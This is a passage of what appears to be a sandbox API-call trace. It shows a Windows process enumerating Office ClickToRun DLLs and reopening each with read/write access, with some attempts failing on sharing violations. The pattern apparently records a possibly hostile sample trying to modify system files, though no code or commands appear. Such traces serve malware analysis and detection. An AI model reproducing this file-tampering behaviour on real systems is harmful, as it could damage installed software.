lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xe76d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVOrchestration.dll", cAlternateFileName="APPVOR~1.DLL")) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0092.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0092.679] AreFileApisANSI () returned 1 [0092.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll", lpUsedDefaultChar=0x0) returned 80 [0092.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0092.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0092.680] AreFileApisANSI () returned 1 [0092.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0092.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0092.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 80 [0092.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.680] GetFileType (hFile=0x33c) returned 0x1 [0092.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0092.680] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.680] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.681] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.681] CloseHandle (hObject=0x33c) returned 1 [0092.681] AreFileApisANSI () returned 1 [0092.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0092.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0092.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8d028, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 80 [0092.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.681] GetLastError () returned 0x20 [0092.681] GetLastError () returned 0x20 [0092.681] SetLastError (dwErrCode=0x20) [0092.681] GetLastError () returned 0x20 [0092.681] SetLastError (dwErrCode=0x20) [0092.682] GetLastError () returned 0x20 [0092.682] SetLastError (dwErrCode=0x20) [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0092.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.682] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x13c4d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVPolicy.dll", cAlternateFileName="APPVPO~1.DLL")) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0092.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0092.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.683] AreFileApisANSI () returned 1 [0092.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll", lpUsedDefaultChar=0x0) returned 73 [0092.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0092.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0092.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0092.683] AreFileApisANSI () returned 1 [0092.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0092.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0092.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 73 [0092.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.683] GetFileType (hFile=0x33c) returned 0x1 [0092.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0092.683] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.684] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.684] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.684] CloseHandle (hObject=0x33c) returned 1 [0092.684] AreFileApisANSI () returned 1 [0092.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0092.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0092.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 73 [0092.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.684] GetLastError () returned 0x20 [0092.684] GetLastError () returned 0x20 [0092.684] SetLastError (dwErrCode=0x20) [0092.684] GetLastError () returned 0x20 [0092.685] SetLastError (dwErrCode=0x20) [0092.685] GetLastError () returned 0x20 [0092.685] SetLastError (dwErrCode=0x20) [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0092.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.685] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVScripting.dll", cAlternateFileName="APPVSC~1.DLL")) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0092.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0092.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0092.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0092.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.686] AreFileApisANSI () returned 1 [0092.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", lpUsedDefaultChar=0x0) returned 76 [0092.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0092.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0092.686] AreFileApisANSI () returned 1 [0092.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0092.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x853a0 [0092.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0092.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.686] GetFileType (hFile=0x33c) returned 0x1 [0092.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0092.687] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.687] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.687] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.687] CloseHandle (hObject=0x33c) returned 1 [0092.687] AreFileApisANSI () returned 1 [0092.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0092.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85440 [0092.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0092.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.688] GetFileType (hFile=0x33c) returned 0x1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0092.688] CloseHandle (hObject=0x33c) returned 1 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: 